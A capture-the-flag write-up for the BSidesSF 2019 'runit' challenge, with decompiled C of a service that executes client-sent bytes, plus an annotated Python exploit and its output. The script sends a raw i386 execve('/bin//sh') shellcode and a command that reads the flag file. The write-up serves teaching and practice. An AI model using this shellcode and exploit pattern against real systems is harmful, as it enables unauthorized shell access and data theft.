BSidesSF 2019 CTF Pwn runit

runit

Send code to the server, and it'll run! Grab the flag from /home/ctf/flag.txt. Location: runit-5094b2cb.challenges.bsidessf.net:5252

$ file runit 
runit: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=fdd5061644dc69c2e4f2a0e98091901b4591be57, not stripped

# checksec.sh --file runit
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   runit

main

/*
 * Decompiled entry point of the challenge service. It maps a 0x400-byte
 * buffer, reads up to 0x400 bytes from fd 0 into it, and then calls the
 * buffer as a function. Running client-supplied bytes is the service's
 * stated purpose, so the "NX enabled" result from checksec does not
 * constrain this path: the mapping itself is requested as executable.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  void *buf; // [esp+8h] [ebp-10h]

  // prot 7 = PROT_READ|PROT_WRITE|PROT_EXEC; flags 34 (0x22) =
  // MAP_PRIVATE|MAP_ANONYMOUS on Linux. The return value is used without
  // being compared against MAP_FAILED.
  buf = mmap(0, 0x400u, 7, 34, 0, 0);
  // Ten-second alarm; no SIGALRM handler is installed in this function.
  alarm(0xAu);
  // Mode 2 is _IONBF in glibc, i.e. unbuffered output.
  setvbuf(stdout, 0, 2, 0);
  // NOTE(review): _bss_start is the decompiler's label for this FILE*;
  // presumably stdin -- confirm in the disassembly.
  setvbuf(_bss_start, 0, 2, 0);
  puts("Send me stuff!!");
  // Only a negative return is treated as an error. A zero-length or short
  // read still falls through to the call below, with the rest of the
  // anonymous mapping left zero-filled.
  if ( read(0, buf, 0x400u) < 0 )
  {
    puts("Error reading!");
    exit(1);
  }
  // Control is transferred to whatever was read. There is no validation,
  // and nothing in this function drops privileges or installs a syscall
  // filter first.
  ((void (*)(void))buf)();
  return 0;
}
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
import struct
import socket

def p(a):
    """Pack an integer as a 4-byte little-endian unsigned value."""
    packed = struct.pack('<I', a)
    return packed
def u(a):
    """Unpack 4 little-endian bytes into an unsigned integer."""
    (value,) = struct.unpack('<I', a)
    return value
def p64(a):
    """Pack an integer as an 8-byte little-endian unsigned value."""
    packed = struct.pack('<Q', a)
    return packed
def u64(a):
    """Unpack 8 little-endian bytes into an unsigned integer."""
    (value,) = struct.unpack('<Q', a)
    return value

def connect(host, port):
    """Open a TCP connection to ``host``:``port`` and return the socket."""
    address = (host, port)
    return socket.create_connection(address)

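def recvuntil(st, debug=False):
    """Read from the module-level socket ``r`` until ``st`` has been received.

    Data is read one byte at a time so nothing past the delimiter is
    consumed.

    Args:
        st: Delimiter to wait for.
        debug: When true, echo each received byte as it arrives.

    Returns:
        Everything received, up to and including the first ``st``.

    Raises:
        EOFError: The peer closed the connection before ``st`` was seen.
    """
    ret = ""
    while st not in ret:
        # The script binds its socket to ``r``; no global ``s`` is defined,
        # so the previous ``s.recv`` raised NameError on first use.
        lret = r.recv(1)
        if not lret:
            # recv() returns an empty string once the peer has closed.
            # Without this check the loop would spin forever.
            raise EOFError("connection closed before delimiter was received")
        if debug:
            print(lret)
        ret += lret
    return ret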

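def recvn(n):
    """Read exactly ``n`` bytes from the module-level socket ``r``.

    Args:
        n: Number of bytes to read.

    Returns:
        The ``n`` bytes received (an empty string when ``n`` is 0 or less).

    Raises:
        EOFError: The peer closed the connection before ``n`` bytes arrived.
    """
    ret = ""
    while len(ret) < n:
        # The script binds its socket to ``r``; no global ``s`` is defined.
        # Asking for the remaining count avoids one recv() call per byte.
        chunk = r.recv(n - len(ret))
        if not chunk:
            # An empty result means the peer closed. The original loop never
            # terminated in that case.
            raise EOFError("connection closed before all bytes were received")
        ret += chunk
    return ret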

def interact():
    """Attach a telnetlib session to the module-level socket ``r`` and hand
    control to the terminal."""
    from telnetlib import Telnet

    session = Telnet()
    # Telnet() is created unconnected; the already-open socket is attached
    # to it directly.
    session.sock = r
    session.interact()

# Endpoint given in the challenge description.
host = 'runit-5094b2cb.challenges.bsidessf.net'
port = 5252

# NOTE(review): the socket is never closed; it is released only when the
# script exits.
r = connect(host, port)

# 21-byte i386 Linux stub that issues execve("/bin//sh", NULL, NULL) via
# int 0x80. It is a fixed byte string with no encoding, so the same sequence
# appears verbatim on the wire.
shellcode = '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'

# Banner printed by the service before it reads.
print r.recv(1024)

payload = ''
payload += shellcode

# The service performs one read() of up to 0x400 bytes and then calls the
# buffer, so the bytes are sent as-is with no framing or length prefix.
r.send(payload)
# recv() returns whatever has arrived at that moment, not a complete message,
# so this call and the one below may each see partial output.
print r.recv(1024)

# From here the connection carries shell input and output. The flag path
# comes from the challenge description.
r.send('cat /home/ctf/flag.txt\n')
print r.recv(1024)
# interact()
$ python exploit.py
Send me stuff!!


CTF{you_ran_it}